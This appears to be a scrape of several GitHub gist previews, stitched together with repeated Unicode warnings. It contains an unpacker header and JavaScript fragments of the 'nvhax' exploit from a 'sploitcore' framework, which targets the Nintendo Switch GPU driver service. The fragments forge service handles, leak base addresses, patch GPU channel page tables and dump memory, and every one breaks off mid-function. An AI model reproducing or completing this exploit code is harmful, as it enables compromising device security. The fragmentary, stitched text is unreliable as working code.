This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0D40AC6C 20 00 BC 0E 46 93 46 9D 47 08 00 00 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
############################################### | |
# TX SX OS unpacker - by hexkyz and naehrwert # | |
############################################### | |
from Crypto.Cipher import AES | |
from Crypto.Util import Counter | |
import os | |
import struct | |
""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# The following is adapted from https://github.com/reswitched/loaders/blob/master/nxo64.py | |
# | |
# =========================================================================================== | |
# | |
# Copyright 2017 Reswitched Team | |
# | |
# Permission to use, copy, modify, and/or distribute this software for any purpose with or | |
# without fee is hereby granted, provided that the above copyright notice and this permission | |
# notice appear in all copies. | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sploitcore.prototype.send_request = function(srv_handle, type, domain_id, cmd_id, params, dump_reply, show_log) { | |
var req_buf = this.malloc(0x1000); | |
if (show_log) | |
utils.log('Request buf: ' + utils.paddr(req_buf)); | |
var request_reply = [0, 0]; | |
var err_code = [0, 0]; | |
// One handle and 2 words input type |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sploitcore.prototype.nvdrv_sharedmem_leak = function(nvdrv_buf, dev_handle) { | |
var temp_buf = this.malloc(0x1000); | |
var nvdrv_ioctl = this.bridge(0x1A247C, types.int, types.void_p, types.int, types.int, types.void_p, types.void_p, types.void_p); | |
// Setup buffers | |
var in_buf_ioctl = utils.add2(temp_buf, 0x000); | |
var out_buf_ioctl = utils.add2(temp_buf, 0x100); | |
var out_buf_status = utils.add2(temp_buf, 0x200); | |
var in_buf = utils.add2(temp_buf, 0x800); | |
var out_buf = utils.add2(temp_buf, 0x900); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sploitcore.prototype.break_nvdrv = function(sm_handle) { | |
var meminfo = this.malloc(0x20); | |
var pageinfo = this.malloc(0x8); | |
// Leak nvservices base address | |
var nvdrv_base = this.get_nvdrv_base(sm_handle); | |
// Forge a new service handle for NVDRV | |
var srv_handle = this.forge_handle(sm_handle, "nvdrv:t"); | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
nvhax exploit | |
*/ | |
// Global nvservices exploit context | |
sploitcore.prototype.nvdrv_exp_ctx = {}; | |
sploitcore.prototype.spawn_nvdrv_srv = function(sm_handle, transf_mem_addr, transf_mem_size) { | |
// Forge a new service handle for NVDRV | |
var srv_handle = this.forge_handle(sm_handle, "nvdrv:t"); | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sploitcore.prototype.nvhax_find_channel = function(hw_num) { | |
var mem_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40000); | |
var page_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40100); | |
var test_addr = [0, 0]; | |
var ch_base_addr = [0, 0]; | |
// Look for user channel | |
while (test_addr[1] < 0x80) | |
{ | |
var result = this.nvhax_svc(0x06, [mem_info_addr, page_info_addr, test_addr], [], false); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sploitcore.prototype.nvhax_patch_channel = function(ch_base_addr, target_paddr) { | |
// Map GPU MMIO | |
var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000); | |
// Page directory is always at channel + 0x15000 | |
var pdb_vaddr = utils.add2(ch_base_addr, 0x15000); | |
// Read page directory base IOVA | |
var pdb_iova_lo = this.nvhax_read32(utils.add2(ch_base_addr, 0x200)); | |
var pdb_iova_hi = this.nvhax_read32(utils.add2(ch_base_addr, 0x204)); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sploitcore.prototype.nvhax_peephole_dump_mem = function(ch_iova, gpu_va, mem_size) { | |
// Map GPU MMIO | |
var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000); | |
// Write the channel's iova in PEEPHOLE PBUS register | |
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 | ch_iova)); | |
// Write the GPU virtual address in PEEPHOLE registers | |
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]); | |
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]); |